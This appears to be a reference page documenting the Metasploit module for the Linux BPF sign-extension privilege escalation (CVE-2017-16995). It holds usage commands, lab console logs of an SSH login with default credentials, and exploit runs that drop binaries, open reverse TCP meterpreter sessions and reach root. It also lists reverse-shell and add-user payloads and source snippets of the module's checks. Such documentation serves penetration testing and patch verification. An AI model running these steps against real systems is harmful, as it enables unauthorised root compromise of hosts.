Linux BPF Sign Extension Local Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/bpf_sign_extension_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Linux BPF Sign Extension Local Privilege Escalation
Module: exploit/linux/local/bpf_sign_extension_priv_esc
Source code: modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
Disclosure date: 2017-11-12
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-16995

This module is also known as get-rekt-linux-hardened.c or upstream44.c.

Linux kernel prior to 4.14.8 contains a vulnerability in the Berkeley Packet Filter (BPF) verifier. The check_alu_op function performs incorrect sign extension which allows the verifier to be bypassed, leading to arbitrary kernel read/write. The target system must be compiled with BPF support and permit unprivileged access to BPF with kernel.unprivileged_bpf_disabled not set to 1. This module has been tested successfully on: Debian 9.0 kernel 4.9.0-3-amd64; Deepin 15.5 kernel 4.9.0-deepin13-amd64; ElementaryOS 0.4.1 kernel 4.8.0-52-generic; Fedora 24 kernel 4.5.5-300.fc24.x86_64; Fedora 25 kernel 4.8.6-300.fc25.x86_64; Fedora 26 kernel 4.11.8-300.fc26.x86_64; Fedora 27 kernel 4.13.9-300.fc27.x86_64; Gentoo 2.2 kernel 4.5.2-aufs-r; Linux Mint 17.3 kernel 4.4.0-89-generic; Linux Mint 18.0 kernel 4.8.0-58-generic; Linux Mint 18.3 kernel 4.13.0-16-generic; Mageia 6 kernel 4.9.35-desktop-1.mga6; Manjero 16.10 kernel 4.4.28-2-MANJARO; Solus 3 kernel 4.12.7-11.current; Ubuntu 14.04.1 kernel 4.4.0-89-generic; Ubuntu 16.04.2 kernel 4.8.0-45-generic; Ubuntu 16.04.3 kernel 4.10.0-28-generic; Ubuntu 17.04 kernel 4.10.0-19-generic; ZorinOS 12.1 kernel 4.8.0-39-generic.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-os-down: Module may crash the OS, and the OS remains down.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/bpf_sign_extension_priv_esc
msf exploit(bpf_sign_extension_priv_esc) > show targets
    ... a list of targets ...
msf exploit(bpf_sign_extension_priv_esc) > set TARGET target-id
msf exploit(bpf_sign_extension_priv_esc) > show options
    ... show and set options ...
msf exploit(bpf_sign_extension_priv_esc) > set SESSION session-id
msf exploit(bpf_sign_extension_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF) which contains a vulnerability where it may improperly perform sign extension. This can be utilized to escalate privileges.

The target system must be compiled with BPF support and must not have kernel.unprivileged_bpf_disabled set to 1.

This module has been tested successfully on:

  • Debian 9.0 kernel 4.9.0-3-amd64;
  • Deepin 15.5 kernel 4.9.0-deepin13-amd64;
  • ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
  • Fedora 25 kernel 4.8.6-300.fc25.x86_64;
  • Fedora 26 kernel 4.11.8-300.fc26.x86_64;
  • Fedora 27 kernel 4.13.9-300.fc27.x86_64;
  • Gentoo 2.2 kernel 4.5.2-aufs-r1;
  • Linux Mint 17.3 kernel 4.4.0-89-generic;
  • Linux Mint 18.0 kernel 4.8.0-58-generic;
  • Linux Mint 18.3 kernel 4.13.0-16-generic;
  • Mageia 6 kernel 4.9.35-desktop-1.mga6;
  • Manjero 16.10 kernel 4.4.28-2-MANJARO;
  • Solus 3 kernel 4.12.7-11.current;
  • Ubuntu 14.04.1 kernel 4.4.0-89-generic;
  • Ubuntu 16.04.2 kernel 4.8.0-45-generic;
  • Ubuntu 16.04.3 kernel 4.10.0-28-generic;
  • Ubuntu 16.04.5 kernel 4.4.0-116-generic;
  • Ubuntu 17.04 kernel 4.10.0-19-generic;
  • ZorinOS 12.1 kernel 4.8.0-39-generic.
  • Verification Steps


    1. Start msfconsole
    2. Exploit a box via whatever method
    3. Do: use exploit/linux/local/bpf_sign_extension_priv_esc
    4. Do: set session #
    5. Do: set verbose true
    6. Do: exploit

    Options


    WritableDir

    A folder we can write files to. Defaults to /tmp

    COMPILE

    If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto

    Scenarios


    Ubuntu 16.04 (with Linux 4.4.0-116-generic)

    Initial Access


      resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
      resource (ubuntu.rb)> set rhosts 2.2.2.2
      rhosts => 2.2.2.2
      resource (ubuntu.rb)> set username ubuntu
      username => ubuntu
      resource (ubuntu.rb)> set password ubuntu
      password => ubuntu
      resource (ubuntu.rb)> exploit
      [+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
      [*] Command shell session 1 opened (1.1.1.1:36273 -> 2.2.2.2:22) at 2018-03-23 20:42:04 -0400
      [*] Scanned 1 of 1 hosts (100% complete)
      [*] Auxiliary module execution completed
    

    Escalate


    In this scenario, gcc is installed so we can live compile on the system.

      resource (ubuntu.rb)> use exploit/linux/local/bpf_sign_extension_priv_esc
      resource (ubuntu.rb)> set verbose true
      verbose => true
      resource (ubuntu.rb)> set session 1
      session => 1
      resource (ubuntu.rb)> set lhost 1.1.1.1
      lhost => 1.1.1.1
      resource (ubuntu.rb)> exploit
      [!] SESSION may not be compatible with this module.
      [*] Started reverse TCP handler on 1.1.1.1:4444 
      [+] Kernel confirmed vulnerable
      [+] gcc is installed
      [*] Live compiling exploit on system
      [*] Writing files to target
      [*] Writing vQIIRofN to /tmp/vQIIRofN.c
      [*] Max line length is 65537
      [*] Writing 7797 bytes in 1 chunks of 26837 bytes (octal-encoded), using printf
      [*] Writing iuRJiXBf to /tmp/iuRJiXBf
      [*] Max line length is 65537
      [*] Writing 283 bytes in 1 chunks of 844 bytes (octal-encoded), using printf
      [*] Starting execution of priv esc.
      [*] Transmitting intermediate stager...(126 bytes)
      [*] Sending stage (812100 bytes) to 2.2.2.2
      [*] task_struct = ffff88003869aa00
      [*] uidptr = ffff8800354fb244
      [*] spawning root shell
      [*] Sleeping before handling stage...
      [+] Deleted /tmp/vQIIRofN.c
      [+] Deleted /tmp/vQIIRofN
      [+] Deleted /tmp/iuRJiXBf
    
      meterpreter > sysinfo
      Computer     : 2.2.2.2
      OS           : Ubuntu 16.04 (Linux 4.4.0-116-generic)
      Architecture : x64
      BuildTuple   : x86_64-linux-musl
      Meterpreter  : x64/linux
      meterpreter > getuid
      Server username: uid=0, gid=0, euid=0, egid=0
    

    Escalate w/ pre-compiled binaries


    It is possible to force pre-compiled binaries, in a scenario where build-essential or gcc aren't on the system.

      resource (ubuntu.rb)> use exploit/linux/local/bpf_sign_extension_priv_esc
      resource (ubuntu.rb)> set verbose true
      verbose => true
      resource (ubuntu.rb)> set session 1
      session => 1
      resource (ubuntu.rb)> set lhost 1.1.1.1
      lhost => 1.1.1.1
      resource (ubuntu.rb)> exploit
      [!] SESSION may not be compatible with this module.
      [*] Started reverse TCP handler on 1.1.1.1:4444 
      [+] Kernel confirmed vulnerable
      [-] gcc is not installed.  Compiling will fail.
      [*] Dropping pre-compiled exploit on system
      [*] Writing vsQTwocG to /tmp/vsQTwocG
      [*] Max line length is 65537
      [*] Writing 14040 bytes in 1 chunks of 36802 bytes (octal-encoded), using printf
      [*] Writing JDQDHtEG to /tmp/JDQDHtEG
      [*] Max line length is 65537
      [*] Writing 283 bytes in 1 chunks of 844 bytes (octal-encoded), using printf
      [*] Starting execution of priv esc.
      [*] Transmitting intermediate stager...(126 bytes)
      [*] Sending stage (812100 bytes) to 2.2.2.2
      [*] task_struct = ffff88003a8a3800
      [*] uidptr = ffff88003d276304
      [*] spawning root shell
      [*] Sleeping before handling stage...
      [+] Deleted /tmp/vsQTwocG
      [+] Deleted /tmp/JDQDHtEG
    
      meterpreter > getuid
      Server username: uid=0, gid=0, euid=0, egid=0
      meterpreter > sysinfo
      Computer     : 2.2.2.2
      OS           : Ubuntu 16.04 (Linux 4.4.0-116-generic)
      Architecture : x64
      BuildTuple   : x86_64-linux-musl
      Meterpreter  : x64/linux
    

    Debian 9.0 (x86_64)

      msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc 
      msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
      session => 1
      msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False
      compile => False
      msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run
    
      [*] Started reverse TCP handler on 172.16.191.188:4444 
      [*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ...
      [*] Writing '/tmp/.1pZhL1gc' (207 bytes) ...
      [*] Launching exploit ...
      [*] Sending stage (861480 bytes) to 172.16.191.236
      [*] Cleaning up /tmp/.1pZhL1gc and /tmp/.JBJBxoEO ...
    
      meterpreter > getuid
      Server username: uid=0, gid=0, euid=0, egid=0
      meterpreter > sysinfo
      Computer     : debian-9-0-x64.local
      OS           : Debian 9.4 (Linux 4.9.0-3-amd64)
      Architecture : x64
      BuildTuple   : i486-linux-musl
      Meterpreter  : x86/linux
      meterpreter > 
    

Go back to menu.

Msfconsole Usage


Here is how the linux/local/bpf_sign_extension_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/bpf_sign_extension_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show info

       Name: Linux BPF Sign Extension Local Privilege Escalation
     Module: exploit/linux/local/bpf_sign_extension_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2017-11-12

Provided by:
  Jann Horn
  bleidl
  vnik
  rlarabee
  h00die
  bcoles <[email protected]>

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  Linux kernel prior to 4.14.8 contains a vulnerability in the 
  Berkeley Packet Filter (BPF) verifier. The `check_alu_op` function 
  performs incorrect sign extension which allows the verifier to be 
  bypassed, leading to arbitrary kernel read/write. The target system 
  must be compiled with BPF support and permit unprivileged access to 
  BPF with `kernel.unprivileged_bpf_disabled` not set to 1. This 
  module has been tested successfully on: Debian 9.0 kernel 
  4.9.0-3-amd64; Deepin 15.5 kernel 4.9.0-deepin13-amd64; ElementaryOS 
  0.4.1 kernel 4.8.0-52-generic; Fedora 24 kernel 
  4.5.5-300.fc24.x86_64; Fedora 25 kernel 4.8.6-300.fc25.x86_64; 
  Fedora 26 kernel 4.11.8-300.fc26.x86_64; Fedora 27 kernel 
  4.13.9-300.fc27.x86_64; Gentoo 2.2 kernel 4.5.2-aufs-r; Linux Mint 
  17.3 kernel 4.4.0-89-generic; Linux Mint 18.0 kernel 
  4.8.0-58-generic; Linux Mint 18.3 kernel 4.13.0-16-generic; Mageia 6 
  kernel 4.9.35-desktop-1.mga6; Manjero 16.10 kernel 4.4.28-2-MANJARO; 
  Solus 3 kernel 4.12.7-11.current; Ubuntu 14.04.1 kernel 
  4.4.0-89-generic; Ubuntu 16.04.2 kernel 4.8.0-45-generic; Ubuntu 
  16.04.3 kernel 4.10.0-28-generic; Ubuntu 17.04 kernel 
  4.10.0-19-generic; ZorinOS 12.1 kernel 4.8.0-39-generic.

References:
  http://www.securityfocus.com/bid/102288
  https://nvd.nist.gov/vuln/detail/CVE-2017-16995
  https://www.exploit-db.com/exploits/44298
  https://www.exploit-db.com/exploits/45010
  https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
  https://cyseclabs.com/exploits/upstream44.c
  https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
  https://www.debian.org/security/2017/dsa-4073
  https://usn.ubuntu.com/3523-2/
  https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html
  https://bugs.chromium.org/p/project-zero/issues/detail?id=1454
  http://openwall.com/lists/oss-security/2017/12/21/2
  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f

Also known as:
  get-rekt-linux-hardened.c
  upstream44.c

Module Options


This is a complete list of options available in the linux/local/bpf_sign_extension_priv_esc exploit:

msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show options

Module options (exploit/linux/local/bpf_sign_extension_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/bpf_sign_extension_priv_esc exploit:

msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show advanced

Module advanced options (exploit/linux/local/bpf_sign_extension_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/bpf_sign_extension_priv_esc module can exploit:

msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/bpf_sign_extension_priv_esc exploit:

msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/adduser                                          normal  No     Linux Add User
   19  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   20  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   23  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   24  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   25  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   27  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   31  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   32  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   33  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   34  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   35  payload/linux/x86/read_file                                        normal  No     Linux Read File
   36  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   37  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   38  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   39  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   40  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   41  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   42  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   46  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   47  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   48  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   49  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/bpf_sign_extension_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

System architecture <ARCH> is not supported


Here is a relevant code snippet related to the "System architecture <ARCH> is not supported" error message:

106:	
107:	  def check
108:	    arch = kernel_hardware
109:	
110:	    unless arch.include?('x86_64')
111:	      return CheckCode::Safe("System architecture #{arch} is not supported")
112:	    end
113:	
114:	    vprint_good("System architecture #{arch} is supported")
115:	
116:	    release = kernel_release

Kernel version <RELEASE> is not vulnerable


Here is a relevant code snippet related to the "Kernel version <RELEASE> is not vulnerable" error message:

114:	    vprint_good("System architecture #{arch} is supported")
115:	
116:	    release = kernel_release
117:	    if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
118:	       Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
119:	      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
120:	    end
121:	
122:	    vprint_good("Kernel version #{release} appears to be vulnerable")
123:	
124:	    if unprivileged_bpf_disabled?

Unprivileged BPF loading is not permitted


Here is a relevant code snippet related to the "Unprivileged BPF loading is not permitted" error message:

120:	    end
121:	
122:	    vprint_good("Kernel version #{release} appears to be vulnerable")
123:	
124:	    if unprivileged_bpf_disabled?
125:	      return CheckCode::Safe('Unprivileged BPF loading is not permitted')
126:	    end
127:	
128:	    vprint_good('Unprivileged BPF loading is permitted')
129:	
130:	    if lkrg_installed?

LKRG is installed


Here is a relevant code snippet related to the "LKRG is installed" error message:

126:	    end
127:	
128:	    vprint_good('Unprivileged BPF loading is permitted')
129:	
130:	    if lkrg_installed?
131:	      return CheckCode::Safe('LKRG is installed')
132:	    end
133:	
134:	    vprint_good('LKRG is not installed')
135:	
136:	    if grsec_installed?

grsecurity is in use


Here is a relevant code snippet related to the "grsecurity is in use" error message:

132:	    end
133:	
134:	    vprint_good('LKRG is not installed')
135:	
136:	    if grsec_installed?
137:	      return CheckCode::Safe('grsecurity is in use')
138:	    end
139:	
140:	    vprint_good('grsecurity is not in use')
141:	
142:	    config = kernel_config

Could not retrieve kernel config


Here is a relevant code snippet related to the "Could not retrieve kernel config" error message:

140:	    vprint_good('grsecurity is not in use')
141:	
142:	    config = kernel_config
143:	
144:	    if config.nil?
145:	      return CheckCode::Detected('Could not retrieve kernel config')
146:	    end
147:	
148:	    unless config.include?('CONFIG_BPF_SYSCALL=y')
149:	      return CheckCode::Safe('Kernel config does not include CONFIG_BPF_SYSCALL')
150:	    end

Kernel config does not include CONFIG_BPF_SYSCALL


Here is a relevant code snippet related to the "Kernel config does not include CONFIG_BPF_SYSCALL" error message:

144:	    if config.nil?
145:	      return CheckCode::Detected('Could not retrieve kernel config')
146:	    end
147:	
148:	    unless config.include?('CONFIG_BPF_SYSCALL=y')
149:	      return CheckCode::Safe('Kernel config does not include CONFIG_BPF_SYSCALL')
150:	    end
151:	
152:	    vprint_good('Kernel config has CONFIG_BPF_SYSCALL enabled')
153:	
154:	    CheckCode::Appears

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

155:	  end
156:	
157:	  def exploit
158:	    if is_root?
159:	      unless datastore['ForceExploit']
160:	        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
161:	      end
162:	    end
163:	
164:	    unless writable?(base_dir)
165:	      fail_with(Failure::BadConfig, "#{base_dir} is not writable")

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

160:	        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
161:	      end
162:	    end
163:	
164:	    unless writable?(base_dir)
165:	      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
166:	    end
167:	
168:	    # Upload exploit executable
169:	    executable_name = ".#{rand_text_alphanumeric(5..10)}"
170:	    executable_path = "#{base_dir}/#{executable_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Jann Horn
  • bleidl
  • vnik
  • rlarabee
  • h00die
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.